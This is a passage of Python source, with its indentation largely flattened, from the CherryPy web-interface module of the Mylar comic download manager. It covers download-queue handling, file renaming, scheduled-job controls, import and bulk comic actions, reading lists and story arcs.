raise cherrypy.HTTPRedirect("comicDetails?ComicID=%s" % comicid)
annualDelete.exposed = True
def ddl_requeue(self, mode, id=None):
myDB = db.DBConnection()
if id is None:
items = myDB.select("SELECT * FROM ddl_info WHERE status = 'Queued' ORDER BY updated_date DESC")
else:
oneitem = myDB.selectone("SELECT * FROM DDL_INFO WHERE ID=?", [id]).fetchone()
items = [oneitem]
itemlist = [x for x in items]
if itemlist is not None:
for item in itemlist:
if all([mylar.CONFIG.DDL_AUTORESUME is True, mode == 'resume', item['status'] != 'Completed']):
try:
filesize = os.stat(os.path.join(mylar.CONFIG.DDL_LOCATION, item['filename'])).st_size
except:
filesize = 0
resume = filesize
elif mode == 'abort':
myDB.upsert("ddl_info", {'Status': 'Failed'}, {'id': id}) #was: DELETE FROM ddl_info where ID=?
continue
elif mode == 'remove':
myDB.action('DELETE FROM ddl_info where ID=?', [id])
continue
else:
resume = None
mylar.DDL_QUEUE.put({'link': item['link'],
'mainlink': item['mainlink'],
'series': item['series'],
'year': item['year'],
'size': item['size'],
'comicid': item['comicid'],
'issueid': item['issueid'],
'id': item['id'],
'resume': resume})
if id is not None and oneitem is not None:
    linemessage = '%s successful for %s' % (mode, oneitem['series'])
else:
    linemessage = '%s successful' % mode
if mode == 'restart_queue':
logger.info('[DDL-RESTART-QUEUE] DDL Queue successfully restarted. Put %s items back into the queue for downloading..' % len(itemlist))
linemessage = 'Successfully restarted Queue'
elif mode == 'restart':
logger.info('[DDL-RESTART] Successfully restarted %s [%s] for downloading..' % (oneitem['series'], oneitem['size']))
elif mode == 'requeue':
logger.info('[DDL-REQUEUE] Successfully requeued %s [%s] for downloading..' % (oneitem['series'], oneitem['size']))
elif mode == 'abort':
logger.info('[DDL-ABORT] Successfully aborted downloading of %s [%s]..' % (oneitem['series'], oneitem['size']))
elif mode == 'remove':
logger.info('[DDL-REMOVE] Successfully removed %s [%s]..' % (oneitem['series'], oneitem['size']))
return json.dumps({'status': True, 'message': linemessage})
ddl_requeue.exposed = True
def queueManage(self): # **args):
myDB = db.DBConnection()
resultlist = 'There are currently no items waiting in the Direct Download (DDL) Queue for processing.'
s_info = myDB.select("SELECT a.ComicName, a.ComicVersion, a.ComicID, a.ComicYear, b.Issue_Number, b.IssueID, c.size, c.status, c.id, c.updated_date, c.issues, c.year FROM comics as a INNER JOIN issues as b ON a.ComicID = b.ComicID INNER JOIN ddl_info as c ON b.IssueID = c.IssueID") # WHERE c.status != 'Downloading'")
o_info = myDB.select("Select a.ComicName, b.Issue_Number, a.IssueID, a.ComicID, c.size, c.status, c.id, c.updated_date, c.issues, c.year from oneoffhistory a join snatched b on a.issueid=b.issueid join ddl_info c on b.issueid=c.issueid where b.provider = 'ddl'")
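#the second query picks up one-off (non-watchlist) DDL grabs by joining oneoffhistory -> snatched -> ddl_info
#on the IssueID, limited to entries that were snatched via the 'ddl' provider.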
if s_info:
resultlist = []
for si in s_info:
if si['issues'] is None:
issue = si['Issue_Number']
year = si['ComicYear']
if issue is not None:
issue = '#%s' % issue
else:
year = si['year']
issue = '#%s' % si['issues']
if si['status'] == 'Completed':
si_status = '100%'
else:
si_status = ''
resultlist.append({'series': si['ComicName'],
'issue': issue,
'id': si['id'],
'volume': si['ComicVersion'],
'year': year,
'size': si['size'].strip(),
'comicid': si['ComicID'],
'issueid': si['IssueID'],
'status': si['status'],
'updated_date': si['updated_date'],
'progress': si_status})
if o_info:
if type(resultlist) is str:
resultlist = []
for oi in o_info:
if oi['issues'] is None:
issue = oi['Issue_Number']
year = oi['year']
if issue is not None:
issue = '#%s' % issue
else:
year = oi['year']
issue = '#%s' % oi['issues']
if oi['status'] == 'Completed':
oi_status = '100%'
else:
oi_status = ''
resultlist.append({'series': oi['ComicName'],
'issue': issue,
'id': oi['id'],
'volume': None,
'year': year,
'size': oi['size'].strip(),
'comicid': oi['ComicID'],
'issueid': oi['IssueID'],
'status': oi['status'],
'updated_date': oi['updated_date'],
'progress': oi_status})
return serve_template(templatename="queue_management.html", title="Queue Management", resultlist=resultlist) #activelist=activelist, resultlist=resultlist)
queueManage.exposed = True
def queueManageIt(self, iDisplayStart=0, iDisplayLength=100, iSortCol_0=0, sSortDir_0="desc", sSearch="", **kwargs):
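#iDisplayStart / iDisplayLength / iSortCol_0 / sSortDir_0 / sSearch (and the aaData / iTotalRecords /
#iTotalDisplayRecords keys returned below) appear to follow the legacy DataTables server-side processing
#convention: the table widget posts its paging/sorting/filter state and expects the filtered page back as JSON.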
iDisplayStart = int(iDisplayStart)
iDisplayLength = int(iDisplayLength)
filtered = []
myDB = db.DBConnection()
resultlist = 'There are currently no items waiting in the Direct Download (DDL) Queue for processing.'
s_info = myDB.select("SELECT a.ComicName, a.ComicVersion, a.ComicID, a.ComicYear, b.Issue_Number, b.IssueID, c.size, c.status, c.id, c.updated_date, c.issues, c.year FROM comics as a INNER JOIN issues as b ON a.ComicID = b.ComicID INNER JOIN ddl_info as c ON b.IssueID = c.IssueID") # WHERE c.status != 'Downloading'")
o_info = myDB.select("Select a.ComicName, b.Issue_Number, a.IssueID, a.ComicID, c.size, c.status, c.id, c.updated_date, c.issues, c.year from oneoffhistory a join snatched b on a.issueid=b.issueid join ddl_info c on b.issueid=c.issueid where b.provider = 'ddl'")
if s_info:
resultlist = []
for si in s_info:
if si['issues'] is None:
issue = si['Issue_Number']
year = si['ComicYear']
if issue is not None:
issue = '#%s' % issue
else:
year = si['year']
issue = '#%s' % si['issues']
if si['status'] == 'Completed':
si_status = '100%'
else:
si_status = ''
if issue is not None:
if si['ComicVersion'] is not None:
series = '%s %s %s (%s)' % (si['ComicName'], si['ComicVersion'], issue, year)
else:
series = '%s %s (%s)' % (si['ComicName'], issue, year)
else:
if si['ComicVersion'] is not None:
series = '%s %s (%s)' % (si['ComicName'], si['ComicVersion'], year)
else:
series = '%s (%s)' % (si['ComicName'], year)
resultlist.append({'series': series, #i['ComicName'],
'issue': issue,
'queueid': si['id'],
'volume': si['ComicVersion'],
'year': year,
'size': si['size'].strip(),
'comicid': si['ComicID'],
'issueid': si['IssueID'],
'status': si['status'],
'updated_date': si['updated_date'],
'progress': si_status})
if o_info:
if type(resultlist) is str:
resultlist = []
for oi in o_info:
if oi['issues'] is None:
issue = oi['Issue_Number']
year = oi['year']
if issue is not None:
issue = '#%s' % issue
else:
year = oi['year']
issue = '#%s' % oi['issues']
if oi['status'] == 'Completed':
oi_status = '100%'
else:
oi_status = ''
if issue is not None:
series = '%s %s (%s)' % (oi['ComicName'], issue, year)
else:
series = '%s (%s)' % (oi['ComicName'], year)
resultlist.append({'series': series,
'issue': issue,
'queueid': oi['id'],
'volume': None,
'year': year,
'size': oi['size'].strip(),
'comicid': oi['ComicID'],
'issueid': oi['IssueID'],
'status': oi['status'],
'updated_date': oi['updated_date'],
'progress': oi_status})
if sSearch == "" or sSearch is None:
filtered = resultlist[::]
else:
filtered = [row for row in resultlist if any([sSearch.lower() in row['series'].lower(), sSearch.lower() in row['status'].lower()])]
sortcolumn = 'series'
if iSortCol_0 == '1':
sortcolumn = 'series'
elif iSortCol_0 == '2':
sortcolumn = 'size'
elif iSortCol_0 == '3':
sortcolumn = 'progress'
elif iSortCol_0 == '4':
sortcolumn = 'status'
elif iSortCol_0 == '5':
sortcolumn = 'updated_date'
filtered.sort(key=lambda x: x[sortcolumn], reverse=sSortDir_0 == "desc")
rows = filtered[iDisplayStart:(iDisplayStart + iDisplayLength)]
rows = [[row['comicid'], row['series'], row['size'], row['progress'], row['status'], row['updated_date'], row['queueid']] for row in rows]
#rows = [{'comicid': row['comicid'], 'series': row['series'], 'size': row['size'], 'progress': row['progress'], 'status': row['status'], 'updated_date': row['updated_date']} for row in rows]
#logger.info('rows: %s' % rows)
return json.dumps({
'iTotalDisplayRecords': len(filtered),
'iTotalRecords': len(resultlist),
'aaData': rows,
})
queueManageIt.exposed = True
def previewRename(self, **args): #comicid=None, comicidlist=None):
file_format = mylar.CONFIG.FILE_FORMAT
myDB = db.DBConnection()
resultlist = []
for k,v in args.items():
if any([k == 'x', k == 'y']):
continue
elif 'file_format' in k:
file_format = str(v)
elif 'comicid' in k:
if type(v) is list:
comicid = str(' '.join(v))
elif type(v) is unicode:
comicid = re.sub('[\]\[\']', '', v.decode('utf-8').encode('ascii')).strip()
else:
comicid = v
if comicid is not None and type(comicid) is not list:
comicidlist = []
comicidlist.append(comicid)
for cid in comicidlist:
comic = myDB.selectone("SELECT * FROM comics WHERE ComicID=?", [cid]).fetchone()
comicdir = comic['ComicLocation']
comicname = comic['ComicName']
issuelist = myDB.select("SELECT * FROM issues WHERE ComicID=? AND Location is not NULL ORDER BY ReleaseDate", [str(cid)])
if issuelist:
for issue in issuelist:
if 'annual' in issue['Location'].lower():
annualize = 'yes'
else:
annualize = None
import filers
rniss = filers.FileHandlers(ComicID=str(cid), IssueID=issue['IssueID'])
renameiss = rniss.rename_file(issue['Location'], annualize=annualize, file_format=file_format)
#renameiss = helpers.rename_param(comicid, comicname, issue['Issue_Number'], issue['Location'], comicyear=None, issueid=issue['IssueID'], annualize=annualize)
resultlist.append({'issueid': renameiss['issueid'],
'comicid': renameiss['comicid'],
'original': issue['Location'],
'new': renameiss['nfilename']})
logger.info('resultlist: %s' % resultlist)
return serve_template(templatename="previewrename.html", title="Preview Renamer", resultlist=resultlist, file_format=file_format, comicid=comicidlist)
previewRename.exposed = True
def manualRename(self, comicid):
if mylar.CONFIG.FILE_FORMAT == '':
logger.error("You haven't specified a File Format in Configuration/Advanced")
logger.error("Cannot rename files.")
return
if type(comicid) is not unicode:
comiclist = comicid
else:
comiclist = []
comiclist.append(comicid)
myDB = db.DBConnection()
for cid in comiclist:
filefind = 0
comic = myDB.selectone("SELECT * FROM comics WHERE ComicID=?", [cid]).fetchone()
comicdir = comic['ComicLocation']
comicname = comic['ComicName']
comicyear = comic['ComicYear']
extensions = ('.cbr', '.cbz', '.cb7')
issues = myDB.select("SELECT * FROM issues WHERE ComicID=?", [cid])
if mylar.CONFIG.ANNUALS_ON:
issues += myDB.select("SELECT * FROM annuals WHERE ComicID=?", [cid])
try:
if mylar.CONFIG.MULTIPLE_DEST_DIRS is not None and mylar.CONFIG.MULTIPLE_DEST_DIRS != 'None' and os.path.join(mylar.CONFIG.MULTIPLE_DEST_DIRS, os.path.basename(comicdir)) != comicdir:
logger.fdebug('multiple_dest_dirs:' + mylar.CONFIG.MULTIPLE_DEST_DIRS)
logger.fdebug('dir: ' + comicdir)
logger.fdebug('os.path.basename: ' + os.path.basename(comicdir))
pathdir = os.path.join(mylar.CONFIG.MULTIPLE_DEST_DIRS, os.path.basename(comicdir))
except:
pass
for root, dirnames, filenames in os.walk(comicdir):
for filename in filenames:
if filename.lower().endswith(extensions):
#logger.info("filename being checked is : " + str(filename))
for issue in issues:
if issue['Location'] == filename:
#logger.error("matched " + str(filename) + " to DB file " + str(issue['Location']))
if 'annual' in issue['Location'].lower():
annualize = 'yes'
else:
annualize = None
renameiss = helpers.rename_param(cid, comicname, issue['Issue_Number'], filename, comicyear=comicyear, issueid=issue['IssueID'], annualize=annualize)
nfilename = renameiss['nfilename']
srciss = os.path.join(comicdir, filename)
if filename != nfilename:
logger.info('Renaming ' + filename + ' ... to ... ' + renameiss['nfilename'])
try:
shutil.move(srciss, renameiss['destination_dir'])
except (OSError, IOError):
logger.error('Failed to move files - check directories and manually re-run.')
return
filefind+=1
else:
logger.info('Not renaming ' + filename + ' as it is in desired format already.')
#continue
logger.info('I have renamed ' + str(filefind) + ' issues of ' + comicname)
updater.forceRescan(cid)
if len(comiclist) > 1:
logger.info('[RENAMER] %s series have been renamed.' % len(comiclist))
manualRename.exposed = True
def searchScan(self, name):
return serve_template(templatename="searchfix.html", title="Manage", name=name)
searchScan.exposed = True
def manage(self):
mylarRoot = mylar.CONFIG.DESTINATION_DIR
import db
myDB = db.DBConnection()
jobresults = myDB.select('SELECT DISTINCT * FROM jobhistory')
if jobresults is not None:
tmp = []
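#prev/next run times are presumably stored as UTC strings; the epoch round-trip below
#(strptime(...) - utcfromtimestamp(0), then fromtimestamp()) converts them to local time for display.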
for jb in jobresults:
if jb['prev_run_datetime'] is not None:
try:
pr = (datetime.datetime.strptime(jb['prev_run_datetime'][:19], '%Y-%m-%d %H:%M:%S') - datetime.datetime.utcfromtimestamp(0)).total_seconds()
except ValueError:
pr = (datetime.datetime.strptime(jb['prev_run_datetime'], '%Y-%m-%d %H:%M:%S.%f') - datetime.datetime.utcfromtimestamp(0)).total_seconds()
prev_run = datetime.datetime.fromtimestamp(pr)
else:
prev_run = None
if jb['next_run_datetime'] is not None:
try:
nr = (datetime.datetime.strptime(jb['next_run_datetime'][:19], '%Y-%m-%d %H:%M:%S') - datetime.datetime.utcfromtimestamp(0)).total_seconds()
except ValueError:
nr = (datetime.datetime.strptime(jb['next_run_datetime'], '%Y-%m-%d %H:%M:%S.%f') - datetime.datetime.utcfromtimestamp(0)).total_seconds()
next_run = datetime.datetime.fromtimestamp(nr)
else:
next_run = None
if 'rss' in jb['JobName'].lower():
if jb['Status'] == 'Waiting' and mylar.CONFIG.ENABLE_RSS is False:
mylar.RSS_STATUS = 'Paused'
elif jb['Status'] == 'Paused' and mylar.CONFIG.ENABLE_RSS is True:
mylar.RSS_STATUS = 'Waiting'
status = mylar.RSS_STATUS
interval = str(mylar.CONFIG.RSS_CHECKINTERVAL) + ' mins'
if 'weekly' in jb['JobName'].lower():
status = mylar.WEEKLY_STATUS
if mylar.CONFIG.ALT_PULL == 2: interval = '4 hrs'
else: interval = '24 hrs'
if 'search' in jb['JobName'].lower():
status = mylar.SEARCH_STATUS
interval = str(mylar.CONFIG.SEARCH_INTERVAL) + ' mins'
if 'updater' in jb['JobName'].lower():
status = mylar.UPDATER_STATUS
interval = str(int(mylar.DBUPDATE_INTERVAL)) + ' mins'
if 'folder' in jb['JobName'].lower():
status = mylar.MONITOR_STATUS
interval = str(mylar.CONFIG.DOWNLOAD_SCAN_INTERVAL) + ' mins'
if 'version' in jb['JobName'].lower():
status = mylar.VERSION_STATUS
interval = str(mylar.CONFIG.CHECK_GITHUB_INTERVAL) + ' mins'
if status != jb['Status'] and not('rss' in jb['JobName'].lower()):
status = jb['Status']
tmp.append({'prev_run_datetime': prev_run,
'next_run_datetime': next_run,
'interval': interval,
'jobname': jb['JobName'],
'status': status})
jobresults = tmp
return serve_template(templatename="manage.html", title="Manage", mylarRoot=mylarRoot, jobs=jobresults)
manage.exposed = True
def jobmanage(self, job, mode):
logger.info('%s : %s' % (job, mode))
jobid = None
job_id_map = {'DB Updater': 'dbupdater', 'Auto-Search': 'search', 'RSS Feeds': 'rss', 'Weekly Pullist': 'weekly', 'Check Version': 'version', 'Folder Monitor': 'monitor'}
jobid = job_id_map.get(job)
logger.info('jobid: %s' % jobid)
if jobid is not None:
myDB = db.DBConnection()
if mode == 'pause':
try:
mylar.SCHED.pause_job(jobid)
except:
pass
logger.info('[%s] Paused scheduled runtime.' % job)
ctrl = {'JobName': job}
val = {'Status': 'Paused'}
if jobid == 'rss':
mylar.CONFIG.ENABLE_RSS = False
elif jobid == 'monitor':
mylar.CONFIG.ENABLE_CHECK_FOLDER = False
myDB.upsert('jobhistory', val, ctrl)
elif mode == 'resume':
try:
mylar.SCHED.resume_job(jobid)
except:
pass
logger.info('[%s] Resumed scheduled runtime.' % job)
ctrl = {'JobName': job}
val = {'Status': 'Waiting'}
myDB.upsert('jobhistory', val, ctrl)
if jobid == 'rss':
mylar.CONFIG.ENABLE_RSS = True
elif jobid == 'monitor':
mylar.CONFIG.ENABLE_CHECK_FOLDER = True
helpers.job_management()
else:
logger.warn('%s cannot be matched against any scheduled jobs - maybe you should restart?' % job)
jobmanage.exposed = True
def schedulerForceCheck(self, jobid):
from apscheduler.triggers.date import DateTrigger
for jb in mylar.SCHED.get_jobs():
if jobid.lower() in str(jb).lower():
logger.info('[%s] Now force submitting job for jobid %s' % (jb, jobid))
if any([jobid == 'rss', jobid == 'weekly', jobid =='search', jobid == 'version', jobid == 'updater', jobid == 'monitor']):
jb.modify(next_run_time=datetime.datetime.utcnow())
break
schedulerForceCheck.exposed = True
def manageComics(self):
comics = helpers.havetotals()
return serve_template(templatename="managecomics.html", title="Manage Comics", comics=comics)
manageComics.exposed = True
def manageIssues(self, **kwargs):
status = kwargs['status']
results = []
resultlist = []
myDB = db.DBConnection()
if mylar.CONFIG.ANNUALS_ON:
issues = myDB.select("SELECT * from issues WHERE Status=? AND ComicName NOT LIKE '%Annual%'", [status])
annuals = myDB.select("SELECT * from annuals WHERE Status=?", [status])
else:
issues = myDB.select("SELECT * from issues WHERE Status=?", [status])
annuals = []
for iss in issues:
results.append(iss)
if status == 'Snatched':
resultlist.append(str(iss['IssueID']))
for ann in annuals:
results.append(ann)
if status == 'Snatched':
resultlist.append(str(ann['IssueID']))
endresults = []
if status == 'Snatched':
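#helpers.chunker presumably splits the snatched IssueID list into batches of 200 so that the generated
#'IN (?,?,...)' clause stays well below SQLite's default bound-parameter limit of 999.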
for genlist in helpers.chunker(resultlist, 200):
tmpsql = "SELECT * FROM snatched where Status='Snatched' and status != 'Post-Processed' and (provider='32P' or Provider='WWT' or Provider='DEM') AND IssueID in ({seq})".format(seq=','.join(['?'] *(len(genlist))))
chkthis = myDB.select(tmpsql, genlist)
if chkthis is None:
continue
else:
for r in results:
rr = dict(r)
snatchit = [x['hash'] for x in chkthis if r['ISSUEID'] == x['IssueID']]
try:
if snatchit:
logger.fdebug('[%s] Discovered previously snatched torrent not downloaded. Marking for manual auto-snatch retrieval: %s' % (r['ComicName'], ''.join(snatchit)))
rr['hash'] = ''.join(snatchit)
else:
rr['hash'] = None
except:
rr['hash'] = None
endresults.append(rr)
results = endresults
return serve_template(templatename="manageissues.html", title="Manage " + str(status) + " Issues", issues=results, status=status)
manageIssues.exposed = True
def manageFailed(self):
results = []
myDB = db.DBConnection()
failedlist = myDB.select('SELECT * from Failed')
for f in failedlist:
if f['Provider'] == 'Public Torrents':
link = helpers.torrent_create(f['Provider'], f['ID'])
else:
link = f['ID']
if f['DateFailed'] is None:
datefailed = '0000-00-00'
else:
datefailed = f['DateFailed']
results.append({"Series": f['ComicName'],
"ComicID": f['ComicID'],
"Issue_Number": f['Issue_Number'],
"Provider": f['Provider'],
"Link": link,
"ID": f['ID'],
"FileName": f['NZBName'],
"DateFailed": datefailed})
return serve_template(templatename="managefailed.html", title="Failed DB Management", failed=results)
manageFailed.exposed = True
def flushImports(self):
myDB = db.DBConnection()
myDB.action('DELETE from importresults')
logger.info("Flushing all Import Results and clearing the tables")
flushImports.exposed = True
def markImports(self, action=None, **args):
import unicodedata
myDB = db.DBConnection()
comicstoimport = []
if action == 'massimport':
logger.info('Initiating mass import.')
cnames = myDB.select("SELECT ComicName, ComicID, Volume, DynamicName from importresults WHERE Status='Not Imported' GROUP BY DynamicName, Volume")
for cname in cnames:
if cname['ComicID']:
comicid = cname['ComicID']
else:
comicid = None
try:
comicstoimport.append({'ComicName': unicodedata.normalize('NFKD', cname['ComicName']).encode('utf-8', 'ignore').decode('utf-8', 'ignore'),
'DynamicName': cname['DynamicName'],
'Volume': cname['Volume'],
'ComicID': comicid})
except Exception as e:
logger.warn('[ERROR] There was a problem attempting to queue %s %s [%s] to import (ignoring): %s' % (cname['ComicName'],cname['Volume'],comicid, e))
logger.info('Will attempt to import ' + str(len(comicstoimport)) + ' series.')
else:
if action == 'importselected':
logger.info('importing selected series.')
for k,v in args.items():
#k = Comicname[Volume]|ComicID
#v = DynamicName
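#hypothetical example: k = 'Fury Max [2012]|39954', v = 'furymax' would yield
#ComicName 'Fury Max', volume '2012' and comicid '39954' after the parsing below.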
Volst = k.find('[')
comicid_st = k.find('|')
if comicid_st == -1:
comicid = None
volume = re.sub('[\[\]]', '', k[Volst:]).strip()
else:
comicid = k[comicid_st+1:]
if comicid == 'None':
comicid = None
volume = re.sub('[\[\]]', '', k[Volst:comicid_st]).strip()
ComicName = k[:Volst].strip()
DynamicName = v
cid = ComicName.decode('utf-8', 'replace')
comicstoimport.append({'ComicName': cid,
'DynamicName': DynamicName,
'Volume': volume,
'ComicID': comicid})
elif action == 'removeimport':
for k,v in args.items():
Volst = k.find('[')
comicid_st = k.find('|')
if comicid_st == -1:
comicid = None
volume = re.sub('[\[\]]', '', k[Volst:]).strip()
else:
comicid = k[comicid_st+1:]
if comicid == 'None':
comicid = None
volume = re.sub('[\[\]]', '', k[Volst:comicid_st]).strip()
ComicName = k[:Volst].strip()
DynamicName = v
if volume is None or volume == 'None':
logger.info('Removing ' + ComicName + ' from the Import list')
myDB.action('DELETE from importresults WHERE DynamicName=? AND (Volume is NULL OR Volume="None")', [DynamicName])
else:
logger.info('Removing ' + ComicName + ' [' + str(volume) + '] from the Import list')
myDB.action('DELETE from importresults WHERE DynamicName=? AND Volume=?', [DynamicName, volume])
if len(comicstoimport) > 0:
logger.info('Initiating selected import mode for ' + str(len(comicstoimport)) + ' series.')
if len(comicstoimport) > 0:
logger.debug('The following series will now be attempted to be imported: %s' % comicstoimport)
threading.Thread(target=self.preSearchit, args=[None, comicstoimport, len(comicstoimport)]).start()
raise cherrypy.HTTPRedirect("importResults")
markImports.exposed = True
def markComics(self, action=None, **args):
myDB = db.DBConnection()
comicsToAdd = []
clist = []
for k,v in args.items():
if k == 'manage_comic_length':
continue
#k = Comicname[ComicYear]
#v = ComicID
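#hypothetical example: k = 'Saga [2012]', v = '56838' would yield ComicName 'Saga',
#ComicYear '2012' and ComicID '56838' after the parsing below.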
comyr = k.find('[')
ComicYear = re.sub('[\[\]]', '', k[comyr:]).strip()
ComicName = k[:comyr].strip()
if isinstance(v, list):
#because multiple items can have the same comicname & year, we need to make sure they're all unique entries
for x in v:
clist.append({'ComicName': ComicName,
'ComicYear': ComicYear,
'ComicID': x})
else:
clist.append({'ComicName': ComicName,
'ComicYear': ComicYear,
'ComicID': v})
for cl in clist:
if action == 'delete':
logger.info('[MANAGE COMICS][DELETION] Now deleting ' + cl['ComicName'] + ' (' + str(cl['ComicYear']) + ') [' + str(cl['ComicID']) + '] from the DB.')
myDB.action('DELETE from comics WHERE ComicID=?', [cl['ComicID']])
myDB.action('DELETE from issues WHERE ComicID=?', [cl['ComicID']])
if mylar.CONFIG.ANNUALS_ON:
myDB.action('DELETE from annuals WHERE ComicID=?', [cl['ComicID']])
logger.info('[MANAGE COMICS][DELETION] Successfully deleted ' + cl['ComicName'] + '(' + str(cl['ComicYear']) + ')')
elif action == 'pause':
controlValueDict = {'ComicID': cl['ComicID']}
newValueDict = {'Status': 'Paused'}
myDB.upsert("comics", newValueDict, controlValueDict)
logger.info('[MANAGE COMICS][PAUSE] ' + cl['ComicName'] + ' has now been put into a Paused State.')
elif action == 'resume':
controlValueDict = {'ComicID': cl['ComicID']}
newValueDict = {'Status': 'Active'}
myDB.upsert("comics", newValueDict, controlValueDict)
logger.info('[MANAGE COMICS][RESUME] ' + cl['ComicName'] + ' has now been put into a Resumed State.')
elif action == 'recheck' or action == 'metatag':
comicsToAdd.append({'ComicID': cl['ComicID'],
'ComicName': cl['ComicName'],
'ComicYear': cl['ComicYear']})
else:
comicsToAdd.append(cl['ComicID'])
if len(comicsToAdd) > 0:
if action == 'recheck':
logger.info('[MANAGE COMICS][RECHECK-FILES] Rechecking Files for ' + str(len(comicsToAdd)) + ' series')
threading.Thread(target=self.forceRescan, args=[comicsToAdd,True,'recheck']).start()
elif action == 'metatag':
logger.info('[MANAGE COMICS][MASS METATAGGING] Now Metatagging Files for ' + str(len(comicsToAdd)) + ' series')
threading.Thread(target=self.forceRescan, args=[comicsToAdd,True,'metatag']).start()
elif action == 'rename':
logger.info('[MANAGE COMICS][MASS RENAMING] Now Renaming Files for ' + str(len(comicsToAdd)) + ' series')
threading.Thread(target=self.manualRename, args=[comicsToAdd]).start()
else:
logger.info('[MANAGE COMICS][REFRESH] Refreshing ' + str(len(comicsToAdd)) + ' series')
threading.Thread(target=updater.dbUpdate, args=[comicsToAdd]).start()
markComics.exposed = True
def forceUpdate(self):
from mylar import updater
threading.Thread(target=updater.dbUpdate).start()
raise cherrypy.HTTPRedirect("home")
forceUpdate.exposed = True
def forceSearch(self):
#from mylar import search
#threading.Thread(target=search.searchforissue).start()
#raise cherrypy.HTTPRedirect("home")
self.schedulerForceCheck(jobid='search')
forceSearch.exposed = True
def forceRescan(self, ComicID, bulk=False, action='recheck'):
if bulk:
cnt = 1
if action == 'recheck':
for cid in ComicID:
logger.info('[MASS BATCH][RECHECK-FILES][' + str(cnt) + '/' + str(len(ComicID)) + '] Rechecking ' + cid['ComicName'] + '(' + str(cid['ComicYear']) + ')')
updater.forceRescan(cid['ComicID'])
cnt+=1
logger.info('[MASS BATCH][RECHECK-FILES] I have completed rechecking files for ' + str(len(ComicID)) + ' series.')
else:
for cid in ComicID:
logger.info('[MASS BATCH][METATAGGING-FILES][' + str(cnt) + '/' + str(len(ComicID)) + '] Now Preparing to metatag series for ' + cid['ComicName'] + '(' + str(cid['ComicYear']) + ')')
self.group_metatag(ComicID=cid['ComicID'])
cnt+=1
logger.info('[MASS BATCH][METATAGGING-FILES] I have completed metatagging files for ' + str(len(ComicID)) + ' series.')
else:
threading.Thread(target=updater.forceRescan, args=[ComicID]).start()
forceRescan.exposed = True
def checkGithub(self):
from mylar import versioncheck
versioncheck.checkGithub()
raise cherrypy.HTTPRedirect("home")
checkGithub.exposed = True
def history(self):
myDB = db.DBConnection()
history = myDB.select('''SELECT * from snatched order by DateAdded DESC''')
return serve_template(templatename="history.html", title="History", history=history)
history.exposed = True
def reOrder(request):
return request
# return serve_template(templatename="reorder.html", title="ReoRdered!", reorder=request)
reOrder.exposed = True
def readlist(self):
myDB = db.DBConnection()
issuelist = myDB.select("SELECT * from readlist")
#tuple this
readlist = []
counts = []
c_added = 0 #count of issues that have been added to the readlist and remain in that status ( meaning not sent / read )
c_sent = 0 #count of issues that have been sent to a third-party device ( auto-marked after a successful send completion )
c_read = 0 #count of issues that have been marked as read ( manually marked as read - future: read state from xml )
for iss in issuelist:
if iss['Status'] == 'Added':
statuschange = iss['DateAdded']
c_added +=1
else:
if iss['Status'] == 'Read':
c_read +=1
elif iss['Status'] == 'Downloaded':
c_sent +=1
statuschange = iss['StatusChange']
readlist.append({"ComicID": iss['ComicID'],
"ComicName": iss['ComicName'],
"SeriesYear": iss['SeriesYear'],
"Issue_Number": iss['Issue_Number'],
"IssueDate": iss['IssueDate'],
"Status": iss['Status'],
"StatusChange": statuschange,
"inCacheDIR": iss['inCacheDIR'],
"Location": iss['Location'],
"IssueID": iss['IssueID']})
counts = {"added": c_added,
"read": c_read,
"sent": c_sent,
"total": (c_added + c_read + c_sent)}
return serve_template(templatename="readinglist.html", title="Reading Lists", issuelist=readlist, counts=counts)
readlist.exposed = True
def clear_arcstatus(self, issuearcid=None):
myDB = db.DBConnection()
myDB.upsert('storyarcs', {'Status': 'Skipped'}, {'IssueArcID': issuearcid})
logger.info('Status set to Skipped.')
clear_arcstatus.exposed = True
def storyarc_main(self, arcid=None):
myDB = db.DBConnection()
arclist = []
if arcid is None:
alist = myDB.select("SELECT * from storyarcs WHERE ComicName is not Null GROUP BY StoryArcID") #COLLATE NOCASE")
else:
alist = myDB.select("SELECT * from storyarcs WHERE ComicName is not Null AND StoryArcID=? GROUP BY StoryArcID", [arcid]) #COLLATE NOCASE")
for al in alist:
totalissues = myDB.select("SELECT COUNT(*) as count from storyarcs WHERE StoryARcID=? AND NOT Manual is 'deleted'", [al['StoryArcID']])
havecnt = myDB.select("SELECT COUNT(*) as count FROM storyarcs WHERE StoryArcID=? AND (Status='Downloaded' or Status='Archived')", [al['StoryArcID']])
havearc = havecnt[0][0]
totalarc = totalissues[0][0]
if not havearc:
havearc = 0
try:
percent = (havearc *100.0) /totalarc
if percent > 100:
percent = 101
except (ZeroDivisionError, TypeError):
percent = 0
totalarc = '?'
arclist.append({"StoryArcID": al['StoryArcID'],
"StoryArc": al['StoryArc'],
"TotalIssues": al['TotalIssues'],
"SeriesYear": al['SeriesYear'],
"StoryArcDir": al['StoryArc'],
"Status": al['Status'],
"percent": percent,
"Have": havearc,
"SpanYears": helpers.spantheyears(al['StoryArcID']),
"Total": totalarc,
"CV_ArcID": al['CV_ArcID']})
if arcid is None:
return serve_template(templatename="storyarc.html", title="Story Arcs", arclist=arclist, delete_type=0)
else:
return arclist[0]
storyarc_main.exposed = True
def detailStoryArc(self, StoryArcID, StoryArcName=None):
myDB = db.DBConnection()
arcinfo = myDB.select("SELECT * from storyarcs WHERE StoryArcID=? and NOT Manual IS 'deleted' order by ReadingOrder ASC", [StoryArcID])
issref = []
spanyears = '?'
try:
cvarcid = arcinfo[0]['CV_ArcID']
arcpub = arcinfo[0]['Publisher']
if StoryArcName is None:
StoryArcName = arcinfo[0]['StoryArc']
lowyear = 9999
maxyear = 0
issref = []
for la in arcinfo:
if all([la['Status'] == 'Downloaded', la['Location'] is None,]):
issref.append({'IssueID': la['IssueID'],
'ComicID': la['ComicID'],
'IssuePublisher': la['IssuePublisher'],
'Publisher': la['Publisher'],
'StoryArc': la['StoryArc'],
'StoryArcID': la['StoryArcID'],
'ComicName': la['ComicName'],
'IssueNumber': la['IssueNumber'],
'ReadingOrder': la['ReadingOrder']})
if la['IssueDate'] is None or la['IssueDate'] == '0000-00-00':
continue
else:
if int(la['IssueDate'][:4]) > maxyear:
maxyear = int(la['IssueDate'][:4])
if int(la['IssueDate'][:4]) < lowyear:
lowyear = int(la['IssueDate'][:4])
if maxyear == 0:
spanyears = la['SeriesYear']
elif lowyear == maxyear:
spanyears = str(maxyear)
else:
spanyears = '%s - %s' % (lowyear, maxyear)
sdir = helpers.arcformat(arcinfo[0]['StoryArc'], spanyears, arcpub)
except:
cvarcid = None
